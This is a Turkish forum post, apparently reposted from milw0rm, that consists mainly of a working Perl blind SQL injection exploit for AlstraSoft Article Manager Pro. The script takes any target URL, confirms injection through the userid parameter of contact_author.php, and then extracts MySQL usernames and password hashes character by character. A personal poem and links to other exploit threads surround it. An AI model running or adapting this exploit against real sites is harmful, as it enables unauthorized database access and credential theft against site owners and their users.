AlstraSoft Article Manager Pro Blind SQL Injection Exploit

Konu Bilgileri
Konu Başlığı AlstraSoft Article Manager Pro Blind SQL Injection Exploit	Konudaki Cevap Sayısı 0
Konuyu Açan Kişi M i r z A	Görüntülenme Sayısı 23

Normal Mod | Çizgisel Mod

AlstraSoft Article Manager Pro Blind SQL Injection Exploit

Yazar Mesaj

M i r z A
EngLisH TeaCHeR
Administrators

Üye No: 1
Katılım: Jun 2006
Yer: French
Mesajlar: 10,023
Grup: Administrators
Durum Çevrimdışı

Rep Ver :
Rep Puanı : 131
Ruh Hali

Mesaj: #1

AlstraSoft Article Manager Pro Blind SQL Injection Exploit

PHP Kodu:

#/usr/bin/perl
#|+| Author: GoLd_M
#--//-->
# -- AlstraSoft Article Manager Pro  Blind SQL Injection Exploit --
#--//--> Exploit :
use strict;
use LWP::Simple;

print "-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-\n";
print "-    AlstraSoft Article Manager Pro  Blind SQL Injection Exploit   -\n";
print "                     GoLd_M Mahmood_ali Tryag.cc/cc                 \n";
print "+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-\n";

print "\nEnter URL (ie: http://server.com): ";
    chomp(my $url=<STDIN>);
    
if(inject_test($url)) {
    print "Injecting.. Please Wait this could take several minutes..\n\n";
    my $details = blind($url);
    print "Exploit Success! Admin Details: ".$details;
    exit;
}

sub blind {

    my $url    = shift;
    my $res    = undef;
    my $chr    = 48;
    my $substr = 1;
    my $done   = 1;
    
    while($done) {
        my $içerik = get($url."/contact_author.php?userid=1)  and ascii(substring((SELECT CONCAT(username,0x3a,password,0x5E) FROM 
mysql.user),".$substr.",1))=".$chr."/*");
        
        if($içerik =~ /Previous/ &amp;&amp; $chr == 94) { $done = 0; }
            elsif($içerik =~ /Previous/) { $res .= chr($chr); $substr++; $chr = 48; }
                else { $chr++; }
    }
    return $res;
}

sub inject_test {

    my $url     = shift;
    my $true    = get($url."/contact_author.php?userid=1) and 1=1 /*");
    my $false   = get($url."/contact_author.php?userid=1) and 1=2 /*");
    
    if($true =~ /Previous/ &amp;&amp; $false !~ /Previous/) {
        print "\nTarget Site Vulnerable!\n\n";
        return 1;
    } else { print "\nTarget Site Not Vulnerable! Exiting..\n"; exit; }
}

# milw0rm.com [2008-07-17] 

Bak Dagıttın Yıktın İşte Tekrar
Aldın Elimden Sessizliğimi ,
Bir kez susmuştum senin için
Ve bir kez daha ,
Çaldın işte tek mirasımı
Mutlusun Biliyorum, Gelmesende
Ben bu sefer Zamklıyorum dudaklarımı suskunluğa yeminle..
Nolur gelme artık git.
Bu sefer ben seni istemiyorum İstanbul !

21-07-2008 10:23:46 AM

Bu kullanıcının gönderdiği mesajları bul

« Daha Eski | Daha Yeni »

Benzer Konular...
Konu:		Yazar	Cevaplar:	Gösterim:	Son Mesaj
	Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability	M i r z A	0	32	21-07-2008 10:28:47 AM Son Mesaj: M i r z A
	Joomla Component DT Register Remote SQL injection	M i r z A	0	43	21-07-2008 10:26:06 AM Son Mesaj: M i r z A
	AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability	M i r z A	0	29	21-07-2008 10:25:36 AM Son Mesaj: M i r z A

Yazdırılabilir Bir Versiyona Bak
Bu Konuyu Bir Arkadaşına Gönder
Bu Konuya Abone Ol | Konuyu Favorilerine Ekle

Foruma Git: